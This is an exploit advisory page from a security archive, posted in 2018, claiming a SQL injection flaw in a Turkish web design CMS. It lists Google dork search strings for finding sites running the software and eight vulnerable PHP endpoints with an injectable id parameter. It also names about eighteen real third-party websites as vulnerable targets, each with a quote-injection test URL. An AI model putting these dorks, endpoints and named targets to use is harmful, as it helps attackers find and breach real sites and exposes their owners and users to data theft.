Twenty Year Anniversary

Siyah Beyaz Bilisim Web Design 1.0 SQL Injection

Siyah Beyaz Bilisim Web Design 1.0 SQL Injection
Posted Dec 3, 2018
Authored by KingSkrupellos

Siyah Beyaz Bilisim Web Design version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, web, sql injection
MD5 | 71e51cbbee06b5b0e7c8aec68c948a70

Siyah Beyaz Bilisim Web Design 1.0 SQL Injection

Change Mirror Download
#################################################################################################

# Exploit Title : Siyah Beyaz BiliAim Web Design 1.0 SQL Injection
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 02/12/2018
# Vendor Homepage : siyahbeyazbilisim.com
# Software Download Link : N/A
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.0
# Exploit Risk : Medium
# # Google Dorks :
intext:''TasarA+-m ve Kodlama Siyah Beyaz BiliAim tarafA+-ndan yapA+-lmA+-AtA+-r.''
intext:''TasarA+-m ve Kodlama SiyahBeyazBiliAim tarafA+-ndan yapA+-lmA+-AtA+-r.''
# CxSecurity Exploit Link : cxsecurity.com/ascii/WLB-2018110203
# Exploit4Arab Exploit Link : exploit4arab.org/exploits/2261
# Exploit4Arab Exploit Link : exploitalert.com/view-details.html?id=31533
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL
Command ('SQL Injection') ]

#################################################################################################

# SQL Injection Exploit :

/yazi.php?id=[SQL Injection]

/resimler.php?id=[SQL Injection]

/sayfa.php?id=[SQL Injection]

/grup.php?id=[SQL Injection]

/haber.php?id=[SQL Injection]

/slider.php?id=[SQL Injection]

/sube.php?id=[SQL Injection]

/duyurular.php?id=[SQL Injection]

#################################################################################################

# Example Vulnerable Sites =>

[+] aydincdm.org/yazi.php?id=5%27 => [ Proof of Concept ] =>
archive.is/cABYo

[+] sevennakliyat.com/resimler.php?id=3%27

[+] tucanteknik.com/sayfa.php?id=110%27

[+] turenyapi.com/grup.php?id=16%27

[+] saranlar.com/sube.php?id=2%27

[+] semirauto.com/grup.php?id=1%27

[+] aydinkompresor.net/kurumsal.php?id=4%27

[+] simgepastacilik.com/grup.php?id=12%27

[+] kocarlitarispamuk.com/grup.php?id=4%27

[+] royalmarine.com.tr/grup.php?id=2%27

[+] didimsanatakademisi.com/album.php?id=12%27

[+] dundarlarparke.com/grup.php?id=6%27

[+] aykimsan.com.tr/grup.php?id=22%27

[+] lilacambalkon.com/resimler.php?id=7%27

[+] avrupakulturakademi.com/sayfa.php?id=1%27

[+] novasluxe.com/sayfa.php?id=21%27

[+] megafit.com.tr/resimler.php?id=3%27

[+] dogrugunespaneli.com/grup.php?id=6%27

#################################################################################################

# Example SQL Database Error :

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result
resource in /home/adsyb/public_html/yazi.php on line 5

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    11 Files
  • 2
    Dec 2nd
    1 Files
  • 3
    Dec 3rd
    18 Files
  • 4
    Dec 4th
    40 Files
  • 5
    Dec 5th
    16 Files
  • 6
    Dec 6th
    50 Files
  • 7
    Dec 7th
    12 Files
  • 8
    Dec 8th
    1 Files
  • 9
    Dec 9th
    1 Files
  • 10
    Dec 10th
    15 Files
  • 11
    Dec 11th
    30 Files
  • 12
    Dec 12th
    25 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close